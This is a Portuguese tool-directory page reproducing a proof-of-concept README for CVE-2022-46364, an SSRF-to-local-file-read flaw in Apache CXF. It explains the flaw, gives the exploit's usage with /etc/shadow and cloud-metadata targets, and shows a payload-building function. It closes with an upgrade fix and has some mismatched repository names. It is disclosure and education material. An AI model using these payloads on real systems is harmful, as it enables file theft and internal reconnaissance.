Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/cybermaksx/cve-2022-46364-proof-of-the-concept
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubcybermaksx/cve-2022-46364-proof-of-the-concept

CVE-2022-46364-Proof-of-the-concept

Ver Repositório
22há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Esta vulnerabilidade permite que um atacante realize ataques de SSRF (Server-Side Request Forgery) em webservices Apache CXF que aceitam solicitações MTOM/XOP. O problema existe na forma como o atributo href de xop:Include é analisado, permitindo que URLs arbitrárias sejam solicitadas pelo servidor.

Compartilhar

CVE-2022-46364: Exploração de SSRF para LFI no Apache CXF MTOM XOP:Include

⚠️ AVISO LEGAL

ESTA FERRAMENTA É APENAS PARA FINS EDUCACIONAIS E TESTES DE SEGURANÇA AUTORIZADOS

Este exploit de prova de conceito é fornecido para fins educacionais, a fim de ajudar profissionais de segurança a compreender a vulnerabilidade e proteger seus sistemas. O acesso não autorizado a sistemas de computador é ilegal. O autor não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta. Você deve obter permissão explícita por escrito do proprietário do sistema antes de testar. Ao usar esta ferramenta, você concorda em cumprir todas as leis aplicáveis.


📋 ÍNDICE

  1. Visão Geral
  2. Detalhes da Vulnerabilidade
  3. Análise Técnica Detalhada
  4. Uso do Exploit
  5. Instalação e Requisitos 6 Mitigação
  6. Referências e Créditos

📌 VISÃO GERAL

AtributoValor
CVE IDCVE-2022-46364
GHSA IDGHSA-x3x3-qwjq-8gj4
Tipo de VulnerabilidadeFalsificação de Solicitação do Lado do Servidor (SSRF) → Inclusão de Arquivo Local (LFI)
Software AfetadoApache CXF < 3.5.5, Apache CXF < 3.4.10
SeveridadeCrítica
Pontuação CVSS9.8 (Crítica)
Vetor de AtaqueRede
AutenticaçãoNenhuma necessária
Versões CorrigidasApache CXF 3.5.5+, 3.4.10+

Este exploit aproveita uma vulnerabilidade crítica de SSRF na implementação MTOM (Message Transmission Optimization Mechanism) do Apache CXF para alcançar Inclusão de Arquivo Local (LFI) e capacidades de varredura de rede interna.


🔬 DETALHES DA VULNERABILIDADE

O Problema Central

O Apache CXF valida incorretamente o atributo href dentro de elementos xop:Include ao processar mensagens SOAP codificadas com MTOM. A biblioteca usa URLConnection do Java para desreferenciar a URI sem restrições de protocolo adequadas, permitindo que atacantes especifiquem:

  • file:// - Ler arquivos locais (LFI)
  • http:// / https:// - Solicitações de rede interna (SSRF)
  • ftp:// - Solicitações FTP (potencial para exploração adicional)

Por Que Isso é Importante

Esta vulnerabilidade é particularmente perigosa porque:

  1. Nenhuma autenticação necessária - Atacantes podem atingir qualquer endpoint SOAP acessível
  2. Nenhum privilégio especial necessário - O servidor executa solicitações com seus próprios privilégios
  3. Divulgação de informações - Pode expor metadados de nuvem (AWS, GCP, Azure), arquivos de configuração e código-fonte
  4. Pivoteamento de rede - O servidor vulnerável torna-se um proxy para reconhecimento de rede interna

Configurações Afetadas

Qualquer implantação do Apache CXF que:

  • Aceite mensagens SOAP codificadas com MTOM
  • Tenha pelo menos um método de serviço web com um parâmetro (qualquer tipo)
  • Use versões anteriores a 3.5.5 (ramo principal) ou 3.4.10 (ramo legado)

🧠 ANÁLISE TÉCNICA DETALHADA

Contexto do Protocolo: MTOM e XOP

MTOM (Message Transmission Optimization Mechanism) é um padrão W3C para otimizar a transmissão de dados binários em mensagens SOAP. Ele usa XOP (XML-binary Optimized Packaging) para incluir referências a dados binários:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <myData>
            <xop:Include href="cid:[email protected]" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </myData>
    </soap:Body>
</soap:Envelope>

Normalmente, href contém uma referência CID (Content-ID) a uma parte MIME. No entanto, a classe AttachmentUtil do Apache CXF processa valores href como URIs genéricas sem sanitização adequada.

O Caminho do Código Vulnerável

  1. Análise da Solicitação:

    • O CXF recebe uma solicitação HTTP multipart/related com Content-Type: application/xop+xml
    • AttachmentUtil.getAttachmentObject() processa elementos xop:Include
  2. Desreferenciação de URI:

    • O método vulnerável chama new URL(href).openStream() diretamente
    • Não há bloqueio do protocolo file://
    • Nenhuma restrição de rede (por exemplo, nenhuma validação contra faixas IP internas)
  3. Incorporação da Resposta:

    • O conteúdo obtido é codificado em Base64 e incorporado na resposta SOAP
    • O atacante recebe os dados no envelope SOAP

Trecho de Código (Padrão Vulnerável)

// Representação simplificada do código vulnerável no CXF < 3.5.5
public DataHandler getAttachmentObject(String href) {
    URL url = new URL(href);  // Nenhuma validação de protocolo!
    return new DataHandler(url.openStream());
}

Por Que o LFI Funciona

O protocolo file:// segue o mesmo caminho de código:

  • file:///etc/passwd → Java abre /etc/passwd como um fluxo de arquivo
  • O conteúdo do arquivo é retornado como anexo
  • Não há restrições de sistema de arquivos além das permissões do usuário do processo CXF

Capacidade de Varredura de Rede

Ao iterar por IPs e portas, atacantes podem:

  • Descobrir serviços internos
  • Acessar endpoints de metadados em nuvem (169.254.169.254)
  • Contornar controles de segmentação de rede

🛠️ USO DO EXPLOIT

Sintaxe do Comando

usage: exploit.py [-h] -t TARGET [-e ENDPOINT] [-u URL] [-f FILE] [-s SCAN]

CVE-2022-46364 Apache CXF SSRF to LFI Exploit - Educational Purpose Only

options:
  -h, --help            Show this help message and exit
  -t TARGET, --target TARGET
                        Target base URL (e.g., http://192.168.1.100:8080)
  -e ENDPOINT, --endpoint ENDPOINT
                        Web service endpoint path (default: /services/Service)
  -u URL, --url URL     External URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)
  -f FILE, --file FILE  Local file path for LFI (e.g., /etc/passwd, C:\\Windows\\win.ini)
  -s SCAN, --scan SCAN  Scan internal network range in CIDR notation (e.g., 192.168.1.0/24)

Explicação dos Argumentos

ArgumentoDescriçãoExemplo
-t, --targetObrigatório. URL base do serviço Apache CXF alvohttp://10.10.10.50:8080
-e, --endpointOpcional. Caminho do endpoint SOAP/services/UserManagement
-u, --urlURL HTTP/HTTPS para buscar via SSRFhttp://169.254.169.254/latest/user-data
-f, --fileCaminho de arquivo local para ler via LFI/etc/shadow, C:\ProgramData\secret.txt

📦 INSTALAÇÃO E REQUISITOS

Pré-requisitos

# Python 3.6 ou superior necessário
python --version

Passos de Instalação

# Clone o repositório
git clone https://github.com/cybermaksxx/CVE-2022-46364-Proof-of-the-concept
cd CVE-2022-46364-PoC

### requisitos

requests>=2.28.0 urllib3>=1.26.0


---



### Detalhes da Implementação Principal

#### 1. Construção do Payload MTOM
```python
def create_mtom_payload(uri):
    """Create a multipart/related MTOM message with xop:Include"""
    soap_part = f"""--MIME_BOUNDARY
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: binary

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <vulnerableParam>
            <xop:Include href="{uri}" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </vulnerableParam>
    </soap:Body>
</soap:Envelope>
--MIME_BOUNDARY--"""
    return soap_part

🛡️ MITIGAÇÃO

Correção Oficial

Atualize para uma versão corrigida:

<!-- Para projetos Maven -->
<dependency>
    <groupId>org.apache.cxf</groupId>
    <artifactId>cxf-rt-frontend-jaxws</artifactId>
    <version>3.5.5</version> <!-- ou 3.4.10 para legado -->
</dependency>

Soluções Alternativas (Se a Correção Não For Possível)

Baixar ferramenta